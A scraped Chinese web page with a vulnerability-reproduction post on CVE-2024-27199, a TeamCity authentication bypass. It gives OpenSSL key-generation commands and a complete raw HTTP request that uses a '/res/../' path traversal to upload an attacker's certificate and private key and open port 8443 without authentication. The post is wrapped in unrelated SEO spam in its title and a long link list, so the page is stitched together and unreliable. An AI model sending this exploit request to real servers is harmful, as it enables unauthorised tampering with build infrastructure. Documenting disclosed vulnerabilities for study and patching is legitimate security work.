当前位置: 首页 > news >正文

做百度网站图片怎么做广告营销的经典案例

news 2025/7/9 11:39:39
做百度网站图片怎么做,广告营销的经典案例,微网站建站平台,2019 做网站漏洞简介 TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。 项目官网…
漏洞简介

TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。

项目官网下载地址Other Versions - TeamCity

参考链接:

  • NVD - CVE-2024-27199
  • CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED) | Rapid7 Blog
影响版本

< 2023.11.4

漏洞复现

1,服务信息泄露

2.HTTPS 证书上传

使用 OpenSSL 生成和处理 ECDSA 密钥对和证书

openssl ecparam -name prime256v1 -genkey -noout -out private-eckey.pem
openssl ec -in private-eckey.pem -pubout -out public-key.pem
openssl req -new -x509 -key private-eckey.pem -out cert.pem -days 360
openssl pkcs8 -topk8 -nocrypt -in private-eckey.pem -out hax.key

运行上面的命令生成如下文件

构造如下包,上传HTTPS 证书并设定8443端口

POST /res/../app/https/settings/uploadCertificate HTTP/1.1
Host: 192.168.116.128:8111
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Length: 1576------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="certificate"; filename="cert.pem"
Content-Type: application/octet-stream-----BEGIN CERTIFICATE-----
MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw
gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G
A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t
b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx
MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI
DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ
dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP
YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj
dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4
WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G
A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w
CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk
SIYVAiEApXhoDMQiv/0NVbZrOyW+c6oMSlg3CuKtAj6Sd5hxWR0=
-----END CERTIFICATE-----------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="key"; filename="hax.key"
Content-Type: application/octet-stream-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK
Z7sGvs81dBDffRUw+ufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc
dt1LIlLOoOawfUO78zy+UGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH
-----END PRIVATE KEY-----------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="port"8443
------WebKitFormBoundary4d5hF7eNFFbgJoAC--

后台验证下证书是否上传

或者直接访问https://192.168.116.128:8443/

漏洞分析

产生漏洞的原因是该系统采用了spring框架,该框架在处理url时遇到url中的../会自行解析再次拼接,这可能会产生某些某些判断机制绕过的现象。其中/res/下的路径不需要认证就可以被服务器去请求,有如下定义

/app/https/settings/**有如下定义

http://www.zhongyajixie.com/news/13085.html

相关文章:

  • 网站有信心做的更好今日特大新闻新事
  • html网站设计模板下载太原seo优化公司
  • php 信息分类网站开发中央新闻联播
  • 怎么做360网站最优化方法
  • 网站建设 石景山沈阳市网站
  • django网站开发流程最新国际消息
  • 做h5动画的素材网站百度招商加盟
  • 网站建站设计英文网站推广
  • 企业设计网站推荐网络推广外包公司
  • 网站源代码在哪里如何让百度收录自己的网站信息
  • 海珠区网站建设如何制作网站免费建站
  • 旅游网站模板源码360网站seo手机优化软件
  • asp.net手机网站开发2022当下社会热点话题
  • 做一个网站开发项目有哪些阶段做网页多少钱一个页面
  • 怎么做网站策划免费推广神器
  • 网站建设和优化成都百度
  • 绍兴网站制作网站平台推广方式
  • wordpress+widget+开发郑州厉害的seo顾问公司
  • 厦门手机网站建设是什么上海最新发布
  • 做问卷赚钱网站福州百度推广开户
  • 南京做网站设计外包公司有哪些
  • 网站开发中怎么设置快捷键简述网站制作的步骤
  • 不用下载直接浏览的网站营销推广方案
  • 中石化网站群建设合肥seo网络优化公司
  • 武汉做网站的公司哪家好百度广告推广费用年费
  • 莆田专业建站公司百度页面推广
  • 做网站怎么买服务器吗怎么做盲盒
  • 什么网站广告做多企业域名查询
  • wordpress显示选项屏蔽自定义栏目武汉seo价格
  • 个人网站建站的流程seo视频教程我要自学网